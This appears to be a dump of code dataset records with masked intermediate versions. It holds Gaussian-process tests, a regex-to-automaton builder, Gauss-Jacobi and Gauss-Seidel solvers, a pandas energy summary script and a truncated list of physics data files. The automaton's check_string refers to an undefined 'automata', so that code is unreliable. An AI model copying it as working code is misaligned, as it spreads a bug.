np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1::]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 1e-1).all()\n assert np.allclose(means[:, 0], m, rtol=1.e-8, atol=1e-4)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\nif __name__ == \"__main__\":\n test_init()\n test_normalize()\n test_K()\n test_ML()\n test_fit()\n test_predict()\n test_pickles()\n # To Do:\n # Test LOO_res and LOO_log_p and fitting with LOO_log_p\n # Test with mean functions\n # Test with given variances\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
def create_AFND(re):
deltas = []
initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))
s = State('s')
f = State('f')
automaton = {s.name: s, f.name: f}
s.add_transition(initial_node, f)
deltas.append((s, initial_node))
while len(deltas) > 0:
origin, simbol = deltas.pop()
if not origin in automaton.values():
automaton.setdefault(origin.name, origin)
if isinstance(simbol, ShuntingYard.Node):
aux_deltas = Thompson.generic(origin, simbol)
for t in aux_deltas:
deltas.insert(0, t)
for state_name in automaton:
automaton[state_name].update_closure()
return automaton
<|reserved_special_token_1|>
from Global import *
import ShuntingYard
from Thompson import *
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
def create_AFND(re):
deltas = []
initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))
s = State('s')
f = State('f')
automaton = {s.name: s, f.name: f}
s.add_transition(initial_node, f)
deltas.append((s, initial_node))
while len(deltas) > 0:
origin, simbol = deltas.pop()
if not origin in automaton.values():
automaton.setdefault(origin.name, origin)
if isinstance(simbol, ShuntingYard.Node):
aux_deltas = Thompson.generic(origin, simbol)
for t in aux_deltas:
deltas.insert(0, t)
for state_name in automaton:
automaton[state_name].update_closure()
return automaton
<|reserved_special_token_1|>
from Global import *
import ShuntingYard
from Thompson import *
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
def create_AFND(re):
deltas = []
initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))
s = State('s')
f = State('f')
automaton = {s.name: s, f.name: f}
#automaton = {s.name: s}
s.add_transition(initial_node, f);
deltas.append((s,initial_node))
while len(deltas) > 0:
(origin, simbol) = deltas.pop()
if not origin in automaton.values():
automaton.setdefault(origin.name, origin)
if isinstance(simbol, ShuntingYard.Node):
aux_deltas = Thompson.generic(origin, simbol)
for t in aux_deltas:
deltas.insert(0, t)
for state_name in automaton:
automaton[state_name].update_closure()
return automaton
|
flexible
|
{
"blob_id": "9cf0174a8bd2bccbd8e5d0be1f0b031a1a23c9df",
"index": 4691,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_string(automaton, word):\n inicial = automata['s'].closure\n for i in word:\n inicial = state_list_delta(inicial, i)\n return automaton['f'] in inicial\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_string(automaton, word):\n inicial = automata['s'].closure\n for i in word:\n inicial = state_list_delta(inicial, i)\n return automaton['f'] in inicial\n\n\ndef create_AFND(re):\n deltas = []\n initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))\n s = State('s')\n f = State('f')\n automaton = {s.name: s, f.name: f}\n s.add_transition(initial_node, f)\n deltas.append((s, initial_node))\n while len(deltas) > 0:\n origin, simbol = deltas.pop()\n if not origin in automaton.values():\n automaton.setdefault(origin.name, origin)\n if isinstance(simbol, ShuntingYard.Node):\n aux_deltas = Thompson.generic(origin, simbol)\n for t in aux_deltas:\n deltas.insert(0, t)\n for state_name in automaton:\n automaton[state_name].update_closure()\n return automaton\n",
"step-4": "from Global import *\nimport ShuntingYard\nfrom Thompson import *\n\n\ndef check_string(automaton, word):\n inicial = automata['s'].closure\n for i in word:\n inicial = state_list_delta(inicial, i)\n return automaton['f'] in inicial\n\n\ndef create_AFND(re):\n deltas = []\n initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))\n s = State('s')\n f = State('f')\n automaton = {s.name: s, f.name: f}\n s.add_transition(initial_node, f)\n deltas.append((s, initial_node))\n while len(deltas) > 0:\n origin, simbol = deltas.pop()\n if not origin in automaton.values():\n automaton.setdefault(origin.name, origin)\n if isinstance(simbol, ShuntingYard.Node):\n aux_deltas = Thompson.generic(origin, simbol)\n for t in aux_deltas:\n deltas.insert(0, t)\n for state_name in automaton:\n automaton[state_name].update_closure()\n return automaton\n",
"step-5": "from Global import *\nimport ShuntingYard\nfrom Thompson import *\n\ndef check_string(automaton, word):\n\tinicial = automata['s'].closure\n\tfor i in word:\n\t\tinicial = state_list_delta(inicial, i)\n\treturn automaton['f'] in inicial\n\ndef create_AFND(re):\n\tdeltas = []\n\n\tinitial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))\n\n\ts = State('s')\n\tf = State('f')\n\tautomaton = {s.name: s, f.name: f}\n\t#automaton = {s.name: s}\n\n\ts.add_transition(initial_node, f);\n\tdeltas.append((s,initial_node))\n\n\twhile len(deltas) > 0:\n\t\t(origin, simbol) = deltas.pop()\n\t\t\n\t\tif not origin in automaton.values():\n\t\t\tautomaton.setdefault(origin.name, origin)\n\n\t\tif isinstance(simbol, ShuntingYard.Node):\n\t\t\taux_deltas = Thompson.generic(origin, simbol)\n\t\t\tfor t in aux_deltas:\n\t\t\t\tdeltas.insert(0, t)\n\n\tfor state_name in automaton:\n\t\tautomaton[state_name].update_closure()\n\n\treturn automaton\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
PRECISAO = 3
MAX_ITER = 20
def gauss_jacobi(entrada,*valores_iniciais):
tamanho = len(entrada[0])
variaveis = [*valores_iniciais[:tamanho]]
variaveism1 = [None] * (tamanho-1)
for _ in range(0,MAX_ITER):
print(variaveis)
for linha in range(tamanho-1):
soma = 0
for coluna in range(tamanho-1):
if(linha!=coluna):
soma += -entrada[linha][coluna]*variaveis[coluna]
variaveism1[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)
if(all([variaveism1[i]==variaveis[i] for i in range(tamanho-1)])):
break
variaveis = [*variaveism1]
return variaveis
def gauss_seidel(entrada,*valores_iniciais):
tamanho = len(entrada[0])
variaveis = [*valores_iniciais[:tamanho]]
antigo = [None] * (tamanho-1)
for _ in range(0,MAX_ITER):
print(variaveis)
for linha in range(tamanho-1):
soma = 0
for coluna in range(tamanho-1):
if(linha!=coluna):
soma += -entrada[linha][coluna]*variaveis[coluna]
variaveis[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)
if(all([antigo[i]==variaveis[i] for i in range(tamanho-1)])):
break
antigo = [*variaveis]
return variaveis
def main():
print()
entrada = [
[10,2,1,7],
[1,5,1,-8],
[2,3,10,6]
]
saida = gauss_jacobi(entrada,0,0,0)
print(saida)
print()
saida = gauss_seidel(entrada,0,0,0)
print(saida)
if __name__=="__main__":
main()
|
normal
|
{
"blob_id": "842f8b4de0378a2c83d22f3fd54ba4857d249597",
"index": 9323,
"step-1": "<mask token>\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\ndef main():\n print()\n entrada = [[10, 2, 1, 7], [1, 5, 1, -8], [2, 3, 10, 6]]\n saida = gauss_jacobi(entrada, 0, 0, 0)\n print(saida)\n print()\n saida = gauss_seidel(entrada, 0, 0, 0)\n print(saida)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\ndef main():\n print()\n entrada = [[10, 2, 1, 7], [1, 5, 1, -8], [2, 3, 10, 6]]\n saida = gauss_jacobi(entrada, 0, 0, 0)\n print(saida)\n print()\n saida = gauss_seidel(entrada, 0, 0, 0)\n print(saida)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "PRECISAO = 3\nMAX_ITER = 20\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\ndef main():\n print()\n entrada = [[10, 2, 1, 7], [1, 5, 1, -8], [2, 3, 10, 6]]\n saida = gauss_jacobi(entrada, 0, 0, 0)\n print(saida)\n print()\n saida = gauss_seidel(entrada, 0, 0, 0)\n print(saida)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "PRECISAO = 3\r\nMAX_ITER = 20\r\n\r\ndef gauss_jacobi(entrada,*valores_iniciais):\r\n tamanho = len(entrada[0])\r\n variaveis = [*valores_iniciais[:tamanho]]\r\n variaveism1 = [None] * (tamanho-1)\r\n for _ in range(0,MAX_ITER):\r\n print(variaveis)\r\n for linha in range(tamanho-1):\r\n soma = 0\r\n for coluna in range(tamanho-1):\r\n if(linha!=coluna):\r\n soma += -entrada[linha][coluna]*variaveis[coluna]\r\n variaveism1[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)\r\n if(all([variaveism1[i]==variaveis[i] for i in range(tamanho-1)])):\r\n break\r\n variaveis = [*variaveism1]\r\n return variaveis\r\n\r\ndef gauss_seidel(entrada,*valores_iniciais):\r\n tamanho = len(entrada[0])\r\n variaveis = [*valores_iniciais[:tamanho]]\r\n antigo = [None] * (tamanho-1)\r\n for _ in range(0,MAX_ITER):\r\n print(variaveis)\r\n for linha in range(tamanho-1):\r\n soma = 0\r\n for coluna in range(tamanho-1):\r\n if(linha!=coluna):\r\n soma += -entrada[linha][coluna]*variaveis[coluna]\r\n variaveis[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)\r\n if(all([antigo[i]==variaveis[i] for i in range(tamanho-1)])):\r\n break\r\n antigo = [*variaveis]\r\n return variaveis\r\n\r\n\r\ndef main():\r\n print()\r\n entrada = [\r\n [10,2,1,7],\r\n [1,5,1,-8],\r\n [2,3,10,6]\r\n ]\r\n saida = gauss_jacobi(entrada,0,0,0)\r\n print(saida)\r\n print()\r\n saida = gauss_seidel(entrada,0,0,0)\r\n print(saida)\r\n\r\nif __name__==\"__main__\":\r\n main()",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 15 06:50:48 2018
@author: Tony
"""
import glob
import pandas as pd
path =r'C:\Users\Tony\Downloads\daily_dataset\daily_dataset' # use your path
frame = pd.DataFrame()
list_ = []
def aggSumFn(path,grpByCol):
allFiles = glob.glob(path + "/*.csv")
for file_ in allFiles:
df = pd.read_csv(file_,index_col=None, header=0)
list_.append(df)
frame = pd.concat(list_)
frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')
frame=frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum().reset_index().sort_values(by=grpByCol)
frame.columns=['week','total_consumption']
frame.to_csv(r'C:\Users\Tony\Downloads\daily_dataset\summary\weekly_dataset_summary.csv')
print('completed')
aggSumFn(path,'day')
#
|
normal
|
{
"blob_id": "252d6b381af09dbafb1d10c188eb154e53213033",
"index": 8845,
"step-1": "<mask token>\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\naggSumFn(path, 'day')\n",
"step-3": "<mask token>\npath = 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\daily_dataset'\nframe = pd.DataFrame()\nlist_ = []\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\naggSumFn(path, 'day')\n",
"step-4": "<mask token>\nimport glob\nimport pandas as pd\npath = 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\daily_dataset'\nframe = pd.DataFrame()\nlist_ = []\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\naggSumFn(path, 'day')\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 15 06:50:48 2018\r\n\r\n@author: Tony\r\n\"\"\"\r\n\r\nimport glob\r\nimport pandas as pd\r\n\r\npath =r'C:\\Users\\Tony\\Downloads\\daily_dataset\\daily_dataset' # use your path\r\n\r\nframe = pd.DataFrame()\r\nlist_ = []\r\ndef aggSumFn(path,grpByCol):\r\n allFiles = glob.glob(path + \"/*.csv\")\r\n for file_ in allFiles:\r\n df = pd.read_csv(file_,index_col=None, header=0)\r\n \r\n list_.append(df)\r\n \r\n frame = pd.concat(list_)\r\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\r\n frame=frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum().reset_index().sort_values(by=grpByCol)\r\n frame.columns=['week','total_consumption']\r\n frame.to_csv(r'C:\\Users\\Tony\\Downloads\\daily_dataset\\summary\\weekly_dataset_summary.csv')\r\n print('completed')\r\n\r\naggSumFn(path,'day')\r\n#\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
readFiles.extend([
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'
,
